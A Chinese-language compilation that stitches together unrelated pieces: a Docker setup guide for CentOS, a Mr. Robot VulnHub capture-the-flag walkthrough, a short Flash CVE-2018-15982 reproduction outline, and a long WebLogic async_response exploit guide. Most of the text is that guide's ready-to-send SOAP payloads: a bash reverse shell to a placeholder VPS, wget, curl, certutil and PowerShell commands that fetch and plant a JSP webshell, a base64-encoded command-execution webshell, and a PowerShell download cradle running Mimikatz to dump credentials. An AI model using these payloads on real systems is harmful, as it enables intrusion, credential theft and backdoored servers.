CentOS 7.x

1.安装与配置 Docker

安装 Docker

首先安装 Docker 必要依赖包 :

yum install -y yum-utils device-mapper-persistent-data lvm2

由于自带 yum 没有 Docker-CE 所以我们需要先增加 docker repo:

yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo

用 yum 安装 Docker:

yum install -y docker-ce

直接yum安装,安装成功后查看版本

docker -v

启动docker

service docker start

设置开机启动

chkconfig docker on

配置 Docker

因为国内访问 Docker Hub 较慢, 可以使用腾讯云提供的国内镜像源, 加速访问 Docker Hub
依次执行以下命令:

echo "OPTIONS='--registry-mirror=https://mirror.ccs.tencentyun.com'" >> /etc/sysconfig/docker

systemctl daemon-reload

service docker restart

2.Docker 的简单操作

下载镜像

下载一个官方的 CentOS 镜像到本地

docker pull centos

下载好的镜像就会出现在镜像列表里

docker images

运行容器

这时我们可以在刚才下载的 CentOS 镜像生成的容器内操作了。
生成一个 centos 镜像为模板的容器并使用 bash shell

docker run -it centos /bin/bash

这个时候可以看到命令行的前端已经变成了 [root@(一串 hash Id)] 的形式, 这说明我们已经成功进入了 CentOS 容器。
在容器内执行任意命令, 不会影响到宿主机, 如下

mkdir -p /data/simple_docker

可以看到 /data 目录下已经创建成功了 simple_docker 文件夹

ls /data

退出容器

exit

查看宿主机的 /data 目录, 并没有 simple_docker 文件夹, 说明容器内的操作不会影响到宿主机

ls /data

保存容器

查看所有的容器信息, 能获取容器的id

docker ps -a

然后执行如下命令,保存镜像:

docker commit -m="备注" 你的CONTAINER_ID 你的IMAGE

1

前言

靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的情节都较为压抑,有点类似于电影《搏击俱乐部》中双重人格的斗争。

虽然有影视色彩的加成,但是剧中的黑客技术细节还是足够真实的,起码符合常规的入侵渗透思路,强烈推荐该剧。

本次靶机有三个flag,难度在初级到中级,非常适合新手训练学习,不需要逆向技术,目标就是找到三个key,并且拿到主机root权限。

2

环境配置

靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/

我使用的是VMware,导入ova文件,NAT方式连接后靶机自动获取IP

本次实战:

靶机IP:192.168.128.142

攻击机IP:192.168.128.106

实战演练

nmap开路,IP发现:

3

端口发现,服务版本探测:

nmap -sV -O 192.168.128.142

4

开启了三个端口,发现web端口:80,443

5

6

查看源码没有发现可用信息,用dirb跑目录:

7

8

发现有robots.txt文件,访问http://192.168.128.142/robots.txt

9

发现两个文件,访问发现第一个目录里是一个密码字典,第二个像是一个密码哈希,这是第一个key

073403c8a58a1f80d943455fb30724b9

10

11

12

密码哈希无法爆破,字典也先放着后面用,现在用nikto扫描,看看有没有可用漏洞:

13

发现有wordpress服务,之前dirb扫目录也发现了wordpress登录页面

http://192.168.128.142/wp-login

14

发现wordpress服务,用wpscan扫描网站,只有登录页面,并没有发现什么可用漏洞

15

在登录页面随便输入之前字典中的用户,发现可以枚举用户名:

16

用burp枚举出了两个用户名:

17

用elloit作为用户名,再挂上这个字典跑密码:

18

跑了好久,终于跑出密码:ER28-0652,字典实在太大了,对字典做了筛选
为了截图方便就把重新跑了一遍

19

接下来就是获取权限了,登陆之后,依次点击apperance>editor>404.php

20

在kali找到php-reverse-shell.php,将其覆盖到404.php
更改监听端口,IP

21

攻击机上监听此端口,访问http://192.168.128.142/234543658,任意不存在页面触发shell

22

执行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 获得一个更加稳定的shell

23

接下来查看靶机密码文件:

24

发现没法利用,先放一放。再看看其他目录,找到一个密码的md5散列.

25

拿出来破解:https://hashkiller.co.uk/md5-decrypter.aspx

abcdefghijklmnopqrstuvwxyz

26

用得到的密码登录robot

27

拿到第二个key,并且又拿到一个加密哈希,估计这个是root用户的密码

提升权限,但是没有成功,只能想别的办法

最后找到一个办法,用nmap执行root权限

28

nmap产生了一个root权限的新shell

29

30

本靶机所涉及的命令

成功拿到第三个key:

04787ddef27c3dee1ee161b21670b4e4

拿到靶机root权限,game over。

总结

这个靶机的难度并不大,遇到的难点:

1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以获得一个稳定的shell,这个在实际渗透中用处也很大

2.用了很多办法,一直拿不到root权限,查了很多资料发现了nmap自带的提权脚本,这个技能get

3.这个靶机只开了web端口,ssh应该也是可以触发的,大牛们可以尝试

4.思路就是通过web页面漏洞拿下了整个主机,wp提权思路也很多,大家也可以换思路渗透。

32

0x00 简介

2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

0x01 攻击流程

1

0x02 漏洞复现

1.git clone漏洞poc

2

2.msf生成后门

3

3.poc执行并开启http

4

4.msf监听

5

5.受害机访问并反弹shell

6

7

0x03 修复建议

将Adobe Flash更新到最新版本!

复现环境

1 Kali2019Win10(关闭安全中心实时防护下)
2 Weblogic10.3.6(wls1036_generic.jar)

漏洞组件

bea_wls9_async_response.war

漏洞路径

http://ip:port/_async/AsyncResponseService

漏洞确认

访问漏洞路径存在以下页面,即有可能存在漏洞

1.png

漏洞利用(所有利用都需要被攻击机能够访问公网)

1.Linux下

1 反弹shell
使用如下报文即可

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/vpsip/vpsport 0>&1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

2 上传webshell

1.放置一个webshell.txt到公网
2.使用以下报文 任选其一

报文一

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

报文二

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.访问webshell

http://ip:port/_async/webshell.jsp

2.png

3 写webshell(无需公网)

1.使用如下报文,任选其一

报文一

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1378
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

报文二

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1376
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

2.访问webshell

报文一的使用方式为
http://ip:port/_async/webshell.jsp?pwd=123&cmd=whoami

3.png

报文二的使用方式为
http://ip:port/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

4.png

2.Win下

1 反弹shell
可直接使用CobaltStrike生成一个payload.ps1 powershell脚本,将该脚本放到公网上,然后使用如下报文即可

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

5.png

2 上传webshell

**1.放置一个webshell.txt到公网
2.使用以下报文 任选其一均可**

报文一

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

报文二

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.访问webshell

http://ip:port/_async/webshell.jsp

6.png

3 写webshell(无需公网)

1.使用如下报文,任选一个报文组

报文组一

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= > serversAdminServertmp_WL_internalbea_wls9_async_response8tpkyswarwebshell.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -decode serversAdminServertmp_WL_internalbea_wls9_async_response8tpkyswarwebshell.txt serversAdminServertmp_WL_internalbea_wls9_async_response8tpkyswarwebshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

报文组二

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -decode servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

2.访问webshell

报文一的使用方式为
http://ip:port/_async/webshell.jsp?pwd=123&cmd=whoami

7.png

报文二的使用方式为
http://ip:port/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

8.png

(注:上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/为默认路径,如果路径修改,可以配合反弹shell进行获取)。